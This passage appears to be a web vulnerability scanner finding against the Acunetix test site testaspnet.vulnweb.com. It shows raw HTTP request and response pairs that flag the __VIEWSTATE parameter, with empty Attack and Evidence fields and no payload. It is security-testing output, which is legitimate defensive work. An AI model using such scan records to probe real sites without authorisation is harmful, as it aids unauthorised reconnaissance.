yBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L%2FR3K%2BNgG4eTH6G64d5v&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKblqunCgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47%2F37fBoWsDm%2B8pRHDKDZX
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:18 GMT Content-Length: 18011
Response Body - size: 18,011 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47/37fBoWsDm+8pRHDKDZX" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3743 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,743 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L%2FR3K%2BNgG4eTH6G64d5v&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKblqunCgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47%2F37fBoWsDm%2B8pRHDKDZX
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:18 GMT Content-Length: 18011
Response Body - size: 18,011 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 